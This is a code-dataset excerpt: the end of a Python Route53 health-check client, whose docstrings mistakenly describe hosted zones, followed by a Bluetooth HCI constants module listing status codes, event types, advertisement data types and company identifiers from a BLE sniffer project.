def create_health_check(self, ipaddress, port, type, resource_path, fqdn, search_string, caller_reference=None):
"""
Creates and returns a new hosted zone. Once a hosted zone is created,
its details can't be changed.
:param str name: The name of the hosted zone to create.
:keyword str caller_reference: A unique string that identifies the
request and that allows failed create_health_check requests to be
retried without the risk of executing the operation twice. If no
value is given, we'll generate a Type 4 UUID for you.
:keyword str comment: An optional comment to attach to the zone.
:rtype: tuple
:returns: A tuple in the form of ``(hosted_zone, change_info)``.
The ``hosted_zone`` variable contains a
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance matching the newly created zone, and ``change_info``
is a dict with some details about the API request.
"""
body = xml_generators.create_health_check_writer(
connection=self,
caller_reference=caller_reference,
ipaddress=ipaddress,
port=port,
type=type,
resource_path=resource_path,
fqdn=fqdn,
search_string=search_string
)
root = self._send_request(
path='healthcheck',
data=body,
method='POST',
)
return xml_parsers.created_health_check_parser(
root=root,
connection=self
)
def get_health_check_by_id(self, id):
"""
Retrieves a hosted zone, by hosted zone ID (not name).
:param str id: The hosted zone's ID (a short hash string).
:rtype: :py:class:`HostedZone <route53.hosted_zone.HostedZone>`
:returns: An :py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance representing the requested hosted zone.
"""
root = self._send_request(
path='healthcheck/%s' % id,
data={},
method='GET',
)
return xml_parsers.get_health_check_by_id_parser(
root=root,
connection=self,
)
def delete_health_check_by_id(self, id):
"""
Deletes a hosted zone, by hosted zone ID (not name).
.. tip:: For most cases, we recommend deleting hosted zones via a
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance's
:py:meth:`HostedZone.delete <route53.hosted_zone.HostedZone.delete>`
method, but this saves an HTTP request if you already know the zone's ID.
.. note:: Unlike
:py:meth:`HostedZone.delete <route53.hosted_zone.HostedZone.delete>`,
this method has no optional ``force`` kwarg.
:param str id: The hosted zone's ID (a short hash string).
:rtype: dict
:returns: A dict of change info, which contains some details about
the request.
"""
root = self._send_request(
path='healthcheck/%s' % id,
data={},
method='DELETE',
)
return xml_parsers.delete_health_check_by_id_parser(
root=root,
connection=self,
)
|
mit
| 6,657,116,449,463,134,000
| 38.884793
| 116
| 0.602137
| false
| 4.334001
| false
| false
| false
|
scipag/btle-sniffer
|
src/btlesniffer/hci_constants.py
|
1
|
50832
|
# -*- coding: utf-8 -*-
"""
Provides constants common in the Bluetooth HCI protocol.
"""
import enum
HCI_MAX_EVENT_SIZE = 260
class Status(enum.IntEnum):
"""
Collection of HCI return states.
"""
Success = 0x00
UnknownHciCommand = 0x01
UnknownConnectionIdentifier = 0x02
HardwareFailure = 0x03
PageTimeout = 0x04
AuthenticationFailure = 0x05
PinOrKeyMissing = 0x06
MemoryCapacityExceeded = 0x07
ConnectionTimeout = 0x08
ConnectionLimitExceeded = 0x09
SynchronousConnectionLimitExceeded = 0x0a
ACLConnectionAlreadyExists = 0x0b
CommandDisallowed = 0x0c
ConnectionRejectedLimitedResources = 0x0d
ConnectionRejectedSecurityReasons = 0x0e
ConnectionRejectedUnnacceptableBDAddr = 0x0f
ConnectionAcceptTimeoutExceeded = 0x10
UnsupportedFeatureOrParameterValue = 0x11
InvalidHciCommandParameters = 0x12
RemoteUserTerminatedConnection = 0x13
RemoteDeviceTerminatedConnectionLowResources = 0x14
RemoteDeviceTerminatedConnectionPowerOff = 0x15
ConnectionTerminatedLocalHost = 0x16
RepeatedAttempts = 0x17
PairingNotAllowed = 0x18
UnknownLmpPdu = 0x19
UnsupportedRemoteFeature = 0x1a
ScoOffsetRejected = 0x1b
ScoIntervalRejected = 0x1c
ScoAirModeRejected = 0x1d
InvalidLmpParameters = 0x1e
UnspecifiedError = 0x1f
UnsupportedLmpParameterValue = 0x20
RoleChangeNotAllowed = 0x21
LmpResponseTimeout = 0x22
LmpErrorTransactionCollision = 0x23
LmpPduNotAllowed = 0x24
EncryptionModeNotAcceptable = 0x25
LinkKeyCannotChange = 0x26
RequestedQosNotSupported = 0x27
InstantPassed = 0x28
PairingWithUnitKeyNotSupported = 0x29
DifferentTransactionCollision = 0x2a
QosUnnacceptableParameter = 0x2c
QosRejected = 0x2d
ChannelClassificationNotSupported = 0x2e
InsufficientSecurity = 0x2f
ParameterOutOfMandatoryRange = 0x30
RoleSwitchPending = 0x32
RoleSwitchFailed = 0x35
ExtendedInquiryResponseTooLarge = 0x36
SecureSimplePairingNotSupportedByHost = 0x37
HostBusyPairing = 0x38
ConnectionRejectedNoSuitableChannel = 0x39
ControllerBusy = 0x3a
UnacceptableConnectionParameters = 0x3b
DirectedAdvertisingTimeout = 0x3c
ConnectionTerminatedMicFailure = 0x3d
ConnectionEstablishFailure = 0x3e
MacConnectionFailed = 0x3f
CoarseClockAdjustmentRejected = 0x40
class PacketType(enum.IntEnum):
"""
Known HCI packet types.
"""
Invalid = 0x00
Command = 0x01
Async = 0x02
Sync = 0x03
Event = 0x04
class Event(enum.IntEnum):
"""
Common HCI event types.
"""
CommandComplete = 0x0e
CommandStatus = 0x0f
HardwareError = 0x10
DataBufferOverflow = 0x1a
Le = 0x3e
VendorSpecific = 0xff
class LeEvent(enum.IntEnum):
"""
Common HCI LE event types.
"""
LeAdvertisingReport = 0x02
class GapProfile(enum.IntEnum):
"""
GAP communication roles/profiles.
"""
Broadcaster = 0x01
Observer = 0x02
Peripheral = 0x04
Central = 0x08
class DiscoveryType(enum.IntEnum):
"""
LeAdvertisingReport message type.
"""
ConnectableUndirectedAdvertising = 0x00
ConnectableDirectedAdvertising = 0x01
ScannableUndirectedAdvertising = 0x02
NonConnectableUndirectedAdvertising = 0x03
ScanResponse = 0x04
class AddressType(enum.IntEnum):
"""
Device address type.
"""
PublicDeviceAddress = 0x00
RandomDeviceAddress = 0x01
PublicIdentityAddress = 0x02
RandomIdentityAddress = 0x03
UnknownAddressType = 0x04
class ScanType(enum.IntEnum):
"""
LE scan type.
"""
PassiveScan = 0x00
ActiveScan = 0x01
class FilterPolicy(enum.IntEnum):
"""
LE scan filter policy.
"""
UndirectedAdsOnly = 0x00
WhitelistedOnly = 0x01
ResolvableDirected = 0x02
WhitelistedAndResolvableDirected = 0x03
class AdType(enum.IntEnum):
"""
Advertisement data type.
"""
Flags = 0x01
IncompleteListOf16BitServiceClassUUIDs = 0x02
CompleteListOf16BitServiceClassUUIDs = 0x03
IncompleteListOf32BitServiceClassUUIDs = 0x04
CompleteListOf32BitServiceClassUUIDs = 0x05
IncompleteListOf128BitServiceClassUUIDs = 0x06
CompleteListOf128BitServiceClassUUIDs = 0x07
ShortenedLocalName = 0x08
CompleteLocalName = 0x09
TxPowerLevel = 0x0a
ClassOfDevice = 0x0d
SimplePairingHashC192 = 0x0e
SimplePairingRandomizerR192 = 0x0f
SecurityManagerTKValue = 0x10
SecurityManagerOutOfBandFlags = 0x11
SlaveConnectionIntervalRange = 0x12
ListOf16BitServiceSolicitationUUIDs = 0x14
ListOf32BitServiceSolicitationUUIDs = 0x1f
ListOf128BitServiceSolicitationUUIDs = 0x15
ServiceData16BitUUID = 0x16
ServiceData32BitUUID = 0x20
ServiceData128BitUUID = 0x21
LeSecureConnectionsConfirmationValue = 0x22
LeSecureConnectionsRandomValue = 0x23
URI = 0x24
IndoorPositioning = 0x25
TransportDiscoveryData = 0x26
PublicTargetAddress = 0x17
RandomTargetAddress = 0x18
Appearance = 0x19
AdvertisingInterval = 0x1a
LeBluetoothDeviceAddress = 0x1b
LeRole = 0x1c
SimplePairingHashC256 = 0x1d
SimplePairingRandomizerR256 = 0x1e
InformationData = 0x3d
ManufacturerSpecificData = 0xff
class CompanyId(enum.IntEnum):
"""
Known company identifiers.
"""
EricssonTechnologyLicensing = 0x0000
NokiaMobilePhones = 0x0001
IntelCorp = 0x0002
IBMCorp = 0x0003
ToshibaCorp = 0x0004
ThreeCom = 0x0005
Microsoft = 0x0006
Lucent = 0x0007
Motorola = 0x0008
InfineonTechnologiesAG = 0x0009
CambridgeSiliconRadio = 0x000a
SiliconWave = 0x000b
DigianswerAS = 0x000c
TexasInstrumentsInc = 0x000d
CevaInc = 0x000e
BroadcomCorporation = 0x000f
MitelSemiconductor = 0x0010
WidcommInc = 0x0011
ZeevoInc = 0x0012
AtmelCorporation = 0x0013
MitsubishiElectricCorporation = 0x0014
RTXTelecomAS = 0x0015
KCTechnologyInc = 0x0016
NewLogic = 0x0017
TransilicaInc = 0x0018
RohdeSchwarzGmbHCoKG = 0x0019
TTPComLimited = 0x001a
SigniaTechnologiesInc = 0x001b
ConexantSystemsInc = 0x001c
Qualcomm = 0x001d
Inventel = 0x001e
AVMBerlin = 0x001f
BandSpeedInc = 0x0020
MansellaLtd = 0x0021
NECCorporation = 0x0022
WavePlusTechnologyCoLtd = 0x0023
Alcatel = 0x0024
NXPSemiconductors = 0x0025
CTechnologies = 0x0026
OpenInterface = 0x0027
RFMicroDevices = 0x0028
HitachiLtd = 0x0029
SymbolTechnologiesInc = 0x002a
Tenovis = 0x002b
MacronixInternationalCoLtd = 0x002c
GCTSemiconductor = 0x002d
NorwoodSystems = 0x002e
MewTelTechnologyInc = 0x002f
STMicroelectronics = 0x0030
Synopsis = 0x0031
RedMLtd = 0x0032
CommilLtd = 0x0033
ComputerAccessTechnologyCorporation = 0x0034
EclipseSL = 0x0035
RenesasElectronicsCorporation = 0x0036
MobilianCorporation = 0x0037
Terax = 0x0038
IntegratedSystemSolutionCorp = 0x0039
MatsushitaElectricIndustrialCoLtd = 0x003a
GennumCorporation = 0x003b
BlackBerryLimited = 0x003c
IPextremeInc = 0x003d
SystemsandChipsInc = 0x003e
BluetoothSIGInc = 0x003f
SeikoEpsonCorporation = 0x0040
IntegratedSiliconSolutionTaiwanInc = 0x0041
CONWISETechnologyCorporationLtd = 0x0042
PARROTSA = 0x0043
SocketMobile = 0x0044
AtherosCommunicationsInc = 0x0045
MediaTekInc = 0x0046
Bluegiga = 0x0047
MarvellTechnologyGroupLtd = 0x0048
ThreeDSPCorporation = 0x0049
AccelSemiconductorLtd = 0x004a
ContinentalAutomotiveSystems = 0x004b
AppleInc = 0x004c
StaccatoCommunicationsInc = 0x004d
AvagoTechnologies = 0x004e
APTLicensingLtd = 0x004f
SiRFTechnology = 0x0050
TzeroTechnologiesInc = 0x0051
JMCorporation = 0x0052
Free2moveAB = 0x0053
ThreeDiJoyCorporation = 0x0054
PlantronicsInc = 0x0055
SonyEricssonMobileCommunications = 0x0056
HarmanInternationalIndustriesInc = 0x0057
VizioInc = 0x0058
NordicSemiconductorASA = 0x0059
EMMicroelectronicMarinSA = 0x005a
RalinkTechnologyCorporation = 0x005b
BelkinInternationalInc = 0x005c
RealtekSemiconductorCorporation = 0x005d
StonestreetOneLLC = 0x005e
WicentricInc = 0x005f
RivieraWavesSAS = 0x0060
RDAMicroelectronics = 0x0061
GibsonGuitars = 0x0062
MiCommandInc = 0x0063
BandXIInternationalLLC = 0x0064
HewlettPackardCompany = 0x0065
NineSolutionsOy = 0x0066
GNNetcomAS = 0x0067
GeneralMotors = 0x0068
ADEngineeringInc = 0x0069
MindTreeLtd = 0x006a
PolarElectroOY = 0x006b
BeautifulEnterpriseCoLtd = 0x006c
BriarTekInc = 0x006d
SummitDataCommunicationsInc = 0x006e
SoundID = 0x006f
MonsterLLC = 0x0070
connectBlueAB = 0x0071
ShangHaiSuperSmartElectronicsCoLtd = 0x0072
GroupSenseLtd = 0x0073
ZommLLC = 0x0074
SamsungElectronicsCoLtd = 0x0075
CreativeTechnologyLtd = 0x0076
LairdTechnologies = 0x0077
NikeInc = 0x0078
lesswireAG = 0x0079
MStarSemiconductorInc = 0x007a
HanlynnTechnologies = 0x007b
ARCambridge = 0x007c
SeersTechnologyCoLtd = 0x007d
SportsTrackingTechnologiesLtd = 0x007e
AutonetMobile = 0x007f
DeLormePublishingCompanyInc = 0x0080
WuXiVimicro = 0x0081
SennheiserCommunicationsAS = 0x0082
TimeKeepingSystemsInc = 0x0083
LudusHelsinkiLtd = 0x0084
BlueRadiosInc = 0x0085
equinoxAG = 0x0086
GarminInternationalInc = 0x0087
Ecotest = 0x0088
GNReSoundAS = 0x0089
Jawbone = 0x008a
TopcornPositioningSystemsLLC = 0x008b
GimbalInc = 0x008c
ZscanSoftware = 0x008d
QuinticCorp = 0x008e
StollmanEVGmbH = 0x008f
FunaiElectricCoLtd = 0x0090
AdvancedPANMOBILSystemsGmbHCoKG = 0x0091
ThinkOpticsInc = 0x0092
UniversalElectronicsInc = 0x0093
AirohaTechnologyCorp = 0x0094
NECLightingLtd = 0x0095
ODMTechnologyInc = 0x0096
ConnecteDeviceLtd = 0x0097
zer01tvGmbH = 0x0098
iTechDynamicGlobalDistributionLtd = 0x0099
Alpwise = 0x009a
JiangsuToppowerAutomotiveElectronicsCoLtd = 0x009b
ColorfyInc = 0x009c
GeoforceInc = 0x009d
BoseCorporation = 0x009e
SuuntoOy = 0x009f
KensingtonComputerProductsGroup = 0x00a0
SRMedizinelektronik = 0x00a1
VertuCorporationLimited = 0x00a2
MetaWatchLtd = 0x00a3
LINAKAS = 0x00a4
OTLDynamicsLLC = 0x00a5
PandaOceanInc = 0x00a6
VisteonCorporation = 0x00a7
ARPDevicesLimited = 0x00a8
MagnetiMarelliSpA = 0x00a9
CAENRFIDsrl = 0x00aa
IngenieurSystemgruppeZahnGmbH = 0x00ab
GreenThrottleGames = 0x00ac
PeterSystemtechnikGmbH = 0x00ad
OmegawaveOy = 0x00ae
Cinetix = 0x00af
PassifSemiconductorCorp = 0x00b0
SarisCyclingGroupInc = 0x00b1
BekeyAS = 0x00b2
ClarinoxTechnologiesPtyLtd = 0x00b3
BDETechnologyCoLtd = 0x00b4
SwirlNetworks = 0x00b5
Mesointernational = 0x00b6
TreLabLtd = 0x00b7
QualcommInnovationCenterInc = 0x00b8
JohnsonControlsInc = 0x00b9
StarkeyLaboratoriesInc = 0x00ba
SPowerElectronicsLimited = 0x00bb
AceSensorInc = 0x00bc
AplixCorporation = 0x00bd
AAMPofAmerica = 0x00be
StalmartTechnologyLimited = 0x00bf
AMICCOMElectronicsCorporation = 0x00c0
ShenzhenExcelsecuDataTechnologyCoLtd = 0x00c1
GeneqInc = 0x00c2
adidasAG = 0x00c3
LGElectronics = 0x00c4
OnsetComputerCorporation = 0x00c5
SelflyBV = 0x00c6
QuuppaOy = 0x00c7
GeLoInc = 0x00c8
Evluma = 0x00c9
MC10 = 0x00ca
BinauricSE = 0x00cb
BeatsElectronics = 0x00cc
MicrochipTechnologyInc = 0x00cd
ElgatoSystemsGmbH = 0x00ce
ARCHOSSA = 0x00cf
DexcomInc = 0x00d0
PolarElectroEuropeBV = 0x00d1
DialogSemiconductorBV = 0x00d2
TaixingbangTechnologyCoLTD = 0x00d3
Kawantech = 0x00d4
AustcoCommunicationSystems = 0x00d5
TimexGroupUSAInc = 0x00d6
QualcommTechnologiesInc = 0x00d7
QualcommConnectedExperiencesInc = 0x00d8
VoyetraTurtleBeach = 0x00d9
txtrGmbH = 0x00da
Biosentronics = 0x00db
ProcterGamble = 0x00dc
HosidenCorporation = 0x00dd
MuzikLLC = 0x00de
MisfitWearablesCorp = 0x00df
Google = 0x00e0
DanlersLtd = 0x00e1
SemilinkInc = 0x00e2
inMusicBrandsInc = 0x00e3
LSResearchInc = 0x00e4
EdenSoftwareConsultantsLtd = 0x00e5
Freshtemp = 0x00e6
KSTechnologies = 0x00e7
ACTSTechnologies = 0x00e8
VtrackSystems = 0x00e9
NielsenKellermanCompany = 0x00ea
ServerTechnologyInc = 0x00eb
BioResearchAssociates = 0x00ec
JollyLogicLLC = 0x00ed
AboveAverageOutcomesInc = 0x00ee
BitsplittersGmbH = 0x00ef
PayPalInc = 0x00f0
WitronTechnologyLimited = 0x00f1
AetherThingsInc = 0x00f2
KentDisplaysInc = 0x00f3
NautilusInc = 0x00f4
SmartifierOy = 0x00f5
ElcometerLimited = 0x00f6
VSNTechnologiesInc = 0x00f7
AceUniCorpLtd = 0x00f8
StickNFind = 0x00f9
CrystalCodeAB = 0x00fa
KOUKAAMas = 0x00fb
DelphiCorporation = 0x00fc
ValenceTechLimited = 0x00fd
Reserved = 0x00fe
TypoProductsLLC = 0x00ff
TomTomInternationalBV = 0x0100
FugooInc = 0x0101
KeiserCorporation = 0x0102
BangOlufsenAS = 0x0103
PLUSLocationsSystemsPtyLtd = 0x0104
UbiquitousComputingTechnologyCorporation = 0x0105
InnovativeYachtterSolutions = 0x0106
WilliamDemantHoldingAS = 0x0107
ChiconyElectronicsCoLtd = 0x0108
AtusBV = 0x0109
CodegateLtd = 0x010a
ERiInc = 0x010b
TransducersDirectLLC = 0x010c
FujitsuTenLimited = 0x010d
AudiAG = 0x010e
HiSiliconTechnologiesCoLtd = 0x010f
NipponSeikiCoLtd = 0x0110
SteelseriesApS = 0x0111
VisyblInc = 0x0112
OpenbrainTechnologiesCoLtd = 0x0113
Xensr = 0x0114
esolutions = 0x0115
OneOAKTechnologies = 0x0116
WimotoTechnologiesInc = 0x0117
RadiusNetworksInc = 0x0118
WizeTechnologyCoLtd = 0x0119
QualcommLabsInc = 0x011a
ArubaNetworks = 0x011b
Baidu = 0x011c
ArendiAG = 0x011d
SkodaAutoas = 0x011e
VolkswagonAG = 0x011f
PorscheAG = 0x0120
SinoWealthElectronicLtd = 0x0121
AirTurnInc = 0x0122
KinsaInc = 0x0123
HIDGlobal = 0x0124
SEATes = 0x0125
PrometheanLtd = 0x0126
SaluticaAlliedSolutions = 0x0127
GPSIGroupPtyLtd = 0x0128
NimbleDevicesOy = 0x0129
ChangzhouYongseInfotechCoLtd = 0x012a
SportIQ = 0x012b
TEMECInstrumentsBV = 0x012c
SonyCorporation = 0x012d
ASSAABLOY = 0x012e
ClarionCoLtd = 0x012f
WarehouseInnovations = 0x0130
CypressSemiconductorCorporation = 0x0131
MADSInc = 0x0132
BlueMaestroLimited = 0x0133
ResolutionProductsInc = 0x0134
AirewearLLC = 0x0135
SeedLabsInc = 0x0136
PrestigioPlazaLtd = 0x0137
NTEOInc = 0x0138
FocusSystemsCorporation = 0x0139
TencentHoldingsLimited = 0x013a
Allegion = 0x013b
MurataManufacuringCoLtd = 0x013c
NodInc = 0x013e
BBManufacturingCompany = 0x013f
AlpineElectronicsCoLtd = 0x0140
FedExServices = 0x0141
GrapeSystemsInc = 0x0142
BkonConnect = 0x0143
LintechGmbH = 0x0144
NovatelWireless = 0x0145
Ciright = 0x0146
MightyCastInc = 0x0147
AmbimatElectronics = 0x0148
PerytonsLtd = 0x0149
TivoliAudioLLC = 0x014a
MasterLock = 0x014b
MeshNetLtd = 0x014c
HuizhouDesaySVAutomotiveCOLTD = 0x014d
TangerineInc = 0x014e
BWGroupLtd = 0x014f
PioneerCorporation = 0x0150
OnBeep = 0x0151
VernierSoftwareTechnology = 0x0152
ROLErgo = 0x0153
PebbleTechnology = 0x0154
NETATMO = 0x0155
AccumulateAB = 0x0156
AnhuiHuamiInformationTechnologyCoLtd = 0x0157
Inmitesro = 0x0158
ChefStepsInc = 0x0159
micasAG = 0x015a
BiomedicalResearchLtd = 0x015b
PitiusTecSL = 0x015c
EstimoteInc = 0x015d
UnikeyTechnologiesInc = 0x015e
TimerCapCo = 0x015f
AwoX = 0x0160
yikes = 0x0161
MADSGlobalNZLtd = 0x0162
PCHInternational = 0x0163
QingdaoYeelinkInformationTechnologyCoLtd = 0x0164
MilwaukeeTool = 0x0165
MISHIKPteLtd = 0x0166
BayerHealthCare = 0x0167
SpiceboxLLC = 0x0168
emberlight = 0x0169
CooperAtkinsCorporation = 0x016a
Qblinks = 0x016b
MYSPHERA = 0x016c
LifeScanInc = 0x016d
VolanticAB = 0x016e
PodoLabsInc = 0x016f
FHoffmannLaRocheAG = 0x0170
AmazonFulfillmentService = 0x0171
ConnovateTechnologyPrivateLimited = 0x0172
KocomojoLLC = 0x0173
EverykeyLLC = 0x0174
DynamicControls = 0x0175
SentriLock = 0x0176
ISYSTinc = 0x0177
CASIOCOMPUTERCOLTD = 0x0178
LAPISSemiconductorCoLtd = 0x0179
TelemonitorInc = 0x017a
taskitGmbH = 0x017b
DaimlerAG = 0x017c
BatAndCat = 0x017d
BluDotzLtd = 0x017e
XTelApS = 0x017f
GigasetCommunicationsGmbH = 0x0180
GeckoHealthInnovationsInc = 0x0181
HOPUbiquitous = 0x0182
ToBeAssigned = 0x0183
Nectar = 0x0184
belappsLLC = 0x0185
CORELightingLtd = 0x0186
SeraphimSenseLtd = 0x0187
UnicoRBC = 0x0188
PhysicalEnterprisesInc = 0x0189
AbleTrendTechnologyLimited = 0x018a
KonicaMinoltaInc = 0x018b
WiloSE = 0x018c
ExtronDesignServices = 0x018d
FitbitInc = 0x018e
FirefliesSystems = 0x018f
IntellettoTechnologiesInc = 0x0190
FDKCORPORATION = 0x0191
CloudleafInc = 0x0192
MavericAutomationLLC = 0x0193
AcousticStreamCorporation = 0x0194
Zuli = 0x0195
PaxtonAccessLtd = 0x0196
WiSilicaInc = 0x0197
VengitLimited = 0x0198
SALTOSYSTEMSSL = 0x0199
TRONForum = 0x019a
CUBETECHsro = 0x019b
CokiyaIncorporated = 0x019c
CVSHealth = 0x019d
Ceruus = 0x019e
StrainstallLtd = 0x019f
ChannelEnterprisesLtd = 0x01a0
FIAMM = 0x01a1
GIGALANECOLTD = 0x01a2
EROAD = 0x01a3
MineSafetyAppliances = 0x01a4
IconHealthandFitness = 0x01a5
AsandooGmbH = 0x01a6
ENERGOUSCORPORATION = 0x01a7
Taobao = 0x01a8
CanonInc = 0x01a9
GeophysicalTechnologyInc = 0x01aa
FacebookInc = 0x01ab
NiproDiagnosticsInc = 0x01ac
FlightSafetyInternational = 0x01ad
EarlensCorporation = 0x01ae
SunriseMicroDevicesInc = 0x01af
StarMicronicsCoLtd = 0x01b0
NetizensSpzoo = 0x01b1
NymiInc = 0x01b2
NytecInc = 0x01b3
TrineoSpzoo = 0x01b4
NestLabsInc = 0x01b5
LMTechnologiesLtd = 0x01b6
GeneralElectricCompany = 0x01b7
iD3SL = 0x01b8
HANAMicron = 0x01b9
StagesCyclingLLC = 0x01ba
CochlearBoneAnchoredSolutionsAB = 0x01bb
SenionLabAB = 0x01bc
SyszoneCoLtd = 0x01bd
PulsateMobileLtd = 0x01be
HongKongHunterSunElectronicLimited = 0x01bf
pironexGmbH = 0x01c0
BRADATECHCorp = 0x01c1
TransenergooilAG = 0x01c2
Bunch = 0x01c3
DMEMicroelectronics = 0x01c4
BitcrazeAB = 0x01c5
HASWAREInc = 0x01c6
AbiogenixInc = 0x01c7
PolyControlApS = 0x01c8
Avion = 0x01c9
LaerdalMedicalAS = 0x01ca
FetchMyPet = 0x01cb
SamLabsLtd = 0x01cc
ChengduSynwingTechnologyLtd = 0x01cd
HOUWASYSTEMDESIGNkk = 0x01ce
BSH = 0x01cf
PrimusInterParesLtd = 0x01d0
August = 0x01d1
GillElectronics = 0x01d2
SkyWaveDesign = 0x01d3
NewlabSrl = 0x01d4
ELADsrl = 0x01d5
Gwearablesinc = 0x01d6
SquadroneSystemsInc = 0x01d7
CodeCorporation = 0x01d8
SavantSystemsLLC = 0x01d9
LogitechInternationalSA = 0x01da
InnblueConsulting = 0x01db
iParkingLtd = 0x01dc
KoninklijkePhilipsElectronicsNV = 0x01dd
MinelabElectronicsPtyLimited = 0x01de
BisonGroupLtd = 0x01df
WidexAS = 0x01e0
JollaLtd = 0x01e1
LectronixInc = 0x01e2
CaterpillarInc = 0x01e3
FreedomInnovations = 0x01e4
DynamicDevicesLtd = 0x01e5
TechnologySolutionsLtd = 0x01e6
IPSGroupInc = 0x01e7
STIR = 0x01e8
SanoInc = 0x01e9
AdvancedApplicationDesignInc = 0x01ea
AutoMapLLC = 0x01eb
SpreadtrumCommunicationsShanghaiLtd = 0x01ec
CuteCircuitLTD = 0x01ed
ValeoService = 0x01ee
FullpowerTechnologiesInc = 0x01ef
KloudNation = 0x01f0
ZebraTechnologiesCorporation = 0x01f1
ItronInc = 0x01f2
TheUniversityofTokyo = 0x01f3
UTCFireandSecurity = 0x01f4
CoolWebthingsLimited = 0x01f5
DJOGlobal = 0x01f6
GellinerLimited = 0x01f7
AnykaMicroelectronicsTechnologyCoLTD = 0x01f8
MedtronicInc = 0x01f9
GozioInc = 0x01fa
FormLiftingLLC = 0x01fb
WahooFitnessLLC = 0x01fc
KontaktMicroLocationSpzoo = 0x01fd
RadioSystemCorporation = 0x01fe
FreescaleSemiconductorInc = 0x01ff
VerifoneSystemsPTeLtdTaiwanBranch = 0x0200
ARTiming = 0x0201
RigadoLLC = 0x0202
KemppiOy = 0x0203
TapcentiveInc = 0x0204
SmartboticsInc = 0x0205
OtterProductsLLC = 0x0206
STEMPInc = 0x0207
LumiGeekLLC = 0x0208
InvisionHeartInc = 0x0209
MacnicaInc = 0x020a
JaguarLandRoverLimited = 0x020b
CoroWareTechnologiesInc = 0x020c
SimploTechnologyCoLTD = 0x020d
OmronHealthcareCoLTD = 0x020e
ComoduleGMBH = 0x020f
ikeGPS = 0x0210
TelinkSemiconductorCoLtd = 0x0211
InterplanCoLtd = 0x0212
WylerAG = 0x0213
IKMultimediaProductionsrl = 0x0214
LukotonExperienceOy = 0x0215
MTILtd = 0x0216
Tech4homeLda = 0x0217
HiotechAB = 0x0218
DOTTLimited = 0x0219
BlueSpeckLabsLLC = 0x021a
CiscoSystemsInc = 0x021b
MobicommInc = 0x021c
Edamic = 0x021d
GoodnetLtd = 0x021e
LusterLeafProductsInc = 0x021f
ManusMachinaBV = 0x0220
MobiquityNetworksInc = 0x0221
PraxisDynamics = 0x0222
PhilipMorrisProductsSA = 0x0223
ComarchSA = 0x0224
NestlNespressoSA = 0x0225
MerliniaAS = 0x0226
LifeBEAMTechnologies = 0x0227
TwocanoesLabsLLC = 0x0228
MuovertiLimited = 0x0229
StamerMusikanlagenGMBH = 0x022a
TeslaMotors = 0x022b
PharynksCorporation = 0x022c
Lupine = 0x022d
SiemensAG = 0x022e
HuamiCultureCommunicationCOLTD = 0x022f
FosterElectricCompanyLtd = 0x0230
ETASA = 0x0231
xSensoSolutionsKft = 0x0232
ShenzhenSuLongCommunicationLtd = 0x0233
FengFanTechnologyCoLtd = 0x0234
QrioInc = 0x0235
PitpatpetLtd = 0x0236
MSHelisrl = 0x0237
Trakm8Ltd = 0x0238
JINCOLtd = 0x0239
AlatechTechnology = 0x023a
BeijingCarePulseElectronicTechnologyCoLtd = 0x023b
Awarepoint = 0x023c
ViCentraBV = 0x023d
RavenIndustries = 0x023e
WaveWareTechnologies = 0x023f
ArgenoxTechnologies = 0x0240
BragiGmbH = 0x0241
SixteenLabInc = 0x0242
MasimoCorp = 0x0243
IoteraInc = 0x0244
EndressHauser = 0x0245
ACKmeNetworksInc = 0x0246
FiftyThreeInc = 0x0247
ParkerHannifinCorp = 0x0248
TranscranialLtd = 0x0249
UwatecAG = 0x024a
OrlanLLC = 0x024b
BlueCloverDevices = 0x024c
MWaySolutionsGmbH = 0x024d
MicrotronicsEngineeringGmbH = 0x024e
SchneiderSchreibgerteGmbH = 0x024f
SapphireCircuitsLLC = 0x0250
LumoBodytechInc = 0x0251
UKCTechnosolution = 0x0252
XicatoInc = 0x0253
Playbrush = 0x0254
DaiNipponPrintingCoLtd = 0x0255
G24PowerLimited = 0x0256
AdBabbleLocalCommerceInc = 0x0257
DevialetSA = 0x0258
ALTYOR = 0x0259
UniversityofAppliedSciencesValaisHauteEcoleValaisanne = 0x025a
FiveInteractiveLLCdbaZendo = 0x025b
NetEaseNetworkcoLtd = 0x025c
LexmarkInternationalInc = 0x025d
FlukeCorporation = 0x025e
YardarmTechnologies = 0x025f
SensaRx = 0x0260
SECVREGmbH = 0x0261
GlacialRidgeTechnologies = 0x0262
IdentivInc = 0x0263
DDSInc = 0x0264
SMKCorporation = 0x0265
SchawbelTechnologiesLLC = 0x0266
XMISystemsSA = 0x0267
Cerevo = 0x0268
TorroxGmbHCoKG = 0x0269
Gemalto = 0x026a
DEKAResearchDevelopmentCorp = 0x026b
DomsterTadeuszSzydlowski = 0x026c
TechnogymSPA = 0x026d
FLEURBAEYBVBA = 0x026e
AptcodeSolutions = 0x026f
LSIADLTechnology = 0x0270
AnimasCorp = 0x0271
AlpsElectricCoLtd = 0x0272
OCEASOFT = 0x0273
MotsaiResearch = 0x0274
Geotab = 0x0275
EGOElektroGertebauGmbH = 0x0276
bewhereinc = 0x0277
JohnsonOutdoorsInc = 0x0278
steuteSchaltgerateGmbHCoKG = 0x0279
Ekominiinc = 0x027a
DEFAAS = 0x027b
AseptikaLtd = 0x027c
HUAWEITechnologiesCoLtd = 0x027d
HabitAwareLLC = 0x027e
ruwidoaustriagmbh = 0x027f
ITECcorporation = 0x0280
StoneL = 0x0281
SonovaAG = 0x0282
MavenMachinesInc = 0x0283
SynapseElectronics = 0x0284
StandardInnovationInc = 0x0285
RFCodeInc = 0x0286
WallyVenturesSL = 0x0287
WillowbankElectronicsLtd = 0x0288
SKTelecom = 0x0289
JetroAS = 0x028a
CodeGearsLTD = 0x028b
NANOLINKAPS = 0x028c
IFLLC = 0x028d
RFDigitalCorp = 0x028e
ChurchDwightCoInc = 0x028f
MultibitOy = 0x0290
CliniCloudInc = 0x0291
SwiftSensors = 0x0292
BlueBite = 0x0293
ELIASGmbH = 0x0294
SivantosGmbH = 0x0295
Petzl = 0x0296
stormpowerltd = 0x0297
EISSTLtd = 0x0298
InexessTechnologySimmaKG = 0x0299
CurrantInc = 0x029a
C2DevelopmentInc = 0x029b
BlueSkyScientificLLCA = 0x029c
ALOTTAZSLABSLLC = 0x029d
Kupsonspolsro = 0x029e
AreusEngineeringGmbH = 0x029f
ImpossibleCameraGmbH = 0x02a0
InventureTrackSystems = 0x02a1
LockedUp = 0x02a2
Itude = 0x02a3
PacificLockCompany = 0x02a4
